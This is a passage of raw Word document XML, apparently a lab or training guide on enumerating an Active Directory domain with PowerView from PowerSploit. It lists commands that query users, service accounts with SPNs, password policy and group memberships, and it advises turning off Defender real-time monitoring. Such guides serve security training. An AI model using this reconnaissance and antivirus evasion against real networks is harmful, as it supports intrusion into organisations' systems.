      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ADUser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> –Filter {</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ServicePrincipalName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> –ne “$null”} -Properties </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ServicePrincipalName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="009D457E" w:rsidP="1E149EC1" w:rsidRDefault="0AB20C1F" w14:paraId="4F9D365E" w14:textId="244025C8">
      <w:pPr>
        <w:spacing w:before="240" w:after="158" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>e.g. MAQ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D457E" w:rsidP="1E149EC1" w:rsidRDefault="0AB20C1F" w14:paraId="0C7460DE" w14:textId="11F9E5BF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="158" w:after="86" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="1E149EC1">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2F5496"/>
        </w:rPr>
        <w:t>PowerView</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="009D457E" w:rsidP="1E149EC1" w:rsidRDefault="0AB20C1F" w14:paraId="5E5448CD" w14:textId="0BEB510A">
      <w:pPr>
        <w:spacing w:before="240" w:after="158" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="1E149EC1">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t xml:space="preserve">On the Windows 10 client, open Powershell.exe (admin privileges are not required). </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D457E" w:rsidP="5E1249AA" w:rsidRDefault="0AB20C1F" w14:paraId="34BE75EA" w14:textId="74CF0304">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="158" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t xml:space="preserve">Import the Powerview (from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>PowerSploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>) module. You may need to turn off MS Defender Real-Time monitoring.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="485ACA2C" w:rsidP="5E1249AA" w:rsidRDefault="485ACA2C" w14:paraId="0479956E" w14:textId="6FDD084B">
      <w:pPr>
        <w:spacing w:before="240" w:after="158" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="417987FA" wp14:editId="4E2F4C89">
            <wp:extent cx="6044565" cy="1005372"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="501418867" name="Picture 501418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565" cy="10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6DBC5F" w:rsidP="5E1249AA" w:rsidRDefault="616DBC5F" w14:paraId="4D0881C1" w14:textId="17B4CCA6">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
        <w:spacing w:before="240" w:after="158" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>cd c:\tools</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="616DBC5F" w:rsidP="5E1249AA" w:rsidRDefault="616DBC5F" w14:paraId="7AD83A57" w14:textId="34A7425E">
      <w:pPr>
        <w:spacing w:before="240" w:after="158" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>. .\powerview.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D457E" w:rsidP="5E1249AA" w:rsidRDefault="0AB20C1F" w14:paraId="304E964E" w14:textId="1964732E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="158" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>Enumerate for admin users, service accounts, password policy, MAQ, Functional levels:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D457E" w:rsidP="1E149EC1" w:rsidRDefault="0AB20C1F" w14:paraId="1E13673B" w14:textId="6F620EFF">
      <w:pPr>
        <w:spacing w:before="240" w:after="158" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>e.g. Default Password Policy</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0233EBDD" w:rsidP="5E1249AA" w:rsidRDefault="0233EBDD" w14:paraId="067747D1" w14:textId="556DE272">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
        <w:spacing w:before="240" w:after="158" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Domain</w:t>
      </w:r>
      <w:r w:rsidRPr="5E1249AA" w:rsidR="45F30BF5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Policy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="49E511F9" w:rsidP="5E1249AA" w:rsidRDefault="49E511F9" w14:paraId="07CEC426" w14:textId="0F20961A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
        <w:spacing w:before="240" w:after="158" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>(Get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DomainPolicy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>)."system access"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D457E" w:rsidP="5E1249AA" w:rsidRDefault="0AB20C1F" w14:paraId="45040018" w14:textId="3BD45950">
      <w:pPr>
        <w:spacing w:before="240" w:after="158" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>e.g.</w:t>
      </w:r>
      <w:r w:rsidRPr="5E1249AA" w:rsidR="65645FAD">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Domain Information</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="65645FAD" w:rsidP="5E1249AA" w:rsidRDefault="65645FAD" w14:paraId="35D54854" w14:textId="532E3356">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
        <w:spacing w:before="240" w:after="158" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Get-NetDomain</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5E1249AA" w:rsidP="5E1249AA" w:rsidRDefault="5E1249AA" w14:paraId="513B718E" w14:textId="06C1199E">
      <w:pPr>
        <w:spacing w:before="240" w:after="158" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D457E" w:rsidP="1E149EC1" w:rsidRDefault="0AB20C1F" w14:paraId="5A9833AB" w14:textId="5F95A069">
      <w:pPr>
        <w:spacing w:before="240" w:after="158" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>e.g.</w:t>
      </w:r>
      <w:r w:rsidRPr="5E1249AA" w:rsidR="7C6B58AC">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Domain</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="5E1249AA" w:rsidR="7C6B58AC">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Users</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D457E" w:rsidP="5E1249AA" w:rsidRDefault="7C6B58AC" w14:paraId="6C76DEEF" w14:textId="6AEDB335">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
        <w:spacing w:before="240" w:after="158" w:line="240" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NetUser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D457E" w:rsidP="5E1249AA" w:rsidRDefault="009D457E" w14:paraId="08D59BA4" w14:textId="7D183D38">
      <w:pPr>
        <w:spacing w:before="240" w:after="158" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D457E" w:rsidP="5E1249AA" w:rsidRDefault="7C6B58AC" w14:paraId="26124728" w14:textId="37DCD127">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
        <w:spacing w:before="240" w:after="158" w:line="240" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NetUser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> | select </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>samaccountname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="009D457E" w:rsidP="5E1249AA" w:rsidRDefault="009D457E" w14:paraId="75E1DC66" w14:textId="42845A25">
      <w:pPr>
        <w:spacing w:before="240" w:after="158" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D457E" w:rsidP="5E1249AA" w:rsidRDefault="5C8F7451" w14:paraId="145FD96B" w14:textId="6A866564">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
        <w:spacing w:before="240" w:after="158" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NetUser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> | select description</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D457E" w:rsidP="1E149EC1" w:rsidRDefault="0AB20C1F" w14:paraId="3DE9CD91" w14:textId="38A12F25">
      <w:pPr>
        <w:spacing w:before="240" w:after="158" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Via SPN existence</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1B407B73" w:rsidP="5E1249AA" w:rsidRDefault="1B407B73" w14:paraId="16F7C36D" w14:textId="704E21DD">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
        <w:spacing w:before="240" w:after="158" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="5E1249AA" w:rsidR="686F0D08">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Net</w:t>
      </w:r>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>User</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -SPN</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0AB20C1F" w:rsidP="5E1249AA" w:rsidRDefault="0AB20C1F" w14:paraId="55FE3796" w14:textId="0B78DD5B">
      <w:pPr>
        <w:spacing w:before="240" w:after="158" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">e.g. </w:t>
      </w:r>
      <w:r w:rsidRPr="5E1249AA" w:rsidR="1EBF8A62">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>All Groups a User Is a Member of</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1EBF8A62" w:rsidP="5E1249AA" w:rsidRDefault="1EBF8A62" w14:paraId="387A06D0" w14:textId="43135FFE">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
        <w:spacing w:before="240" w:after="158" w:line="240" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DomainGroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>MemberIdentity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;username&gt; | select </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>samaccountname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="009D457E" w:rsidP="1E149EC1" w:rsidRDefault="009D457E" w14:paraId="516949E0" w14:textId="38AF8A56">
      <w:pPr>
        <w:spacing w:before="240" w:after="158" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="70FBF9D2" w:rsidP="5E1249AA" w:rsidRDefault="70FBF9D2" w14:paraId="6294593F" w14:textId="760DAF74">
      <w:pPr>
        <w:spacing w:before="240" w:after="158" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>e.g. Check If the Current User Has Administrative Access to local (or a remote) machine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="045AF3C1" w:rsidP="5E1249AA" w:rsidRDefault="045AF3C1" w14:paraId="7BDDBECA" w14:textId="5260E3D2">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
        <w:spacing w:before="240" w:after="158" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Test-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>AdminAccess</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="20B0CAC6" w:rsidP="5E1249AA" w:rsidRDefault="20B0CAC6" w14:paraId="319AAEEF" w14:textId="3E8397FB">
      <w:pPr>
        <w:spacing w:before="240" w:after="158" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>e.g. All Members of a Group</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="20B0CAC6" w:rsidP="5E1249AA" w:rsidRDefault="20B0CAC6" w14:paraId="3C1258BC" w14:textId="67D796B3">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
        <w:spacing w:before="240" w:after="158" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5E1249AA">
